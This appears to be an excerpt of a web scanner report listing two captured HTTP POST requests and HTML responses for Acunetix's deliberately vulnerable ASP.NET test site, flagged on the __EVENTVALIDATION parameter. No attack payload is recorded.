Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8502&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDA8tvoOtsIZGRkFJ2qA%2Fa3iol39l4X0kvLUo%2F07PA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKNppaDCQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwe5JtPTC3nFln5JYfM7NByCbtcBZw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:50 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDA8tvoOtsIZGRkFJ2qA/a3iol39l4X0kvLUo/07PA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKNppaDCQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwe5JtPTC3nFln5JYfM7NByCbtcBZw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:White" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8560&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBA6Hd8aNsIZGRkdrg7BxkahfveHe3svnzPQWS1pbg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKnsZbUDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMceskj4Hc9lxGfs7hBYftpsrqC88%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:26 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBA6Hd8aNsIZGRkdrg7BxkahfveHe3svnzPQWS1pbg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKnsZbUDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMceskj4Hc9lxGfs7hBYftpsrqC88=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:White" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
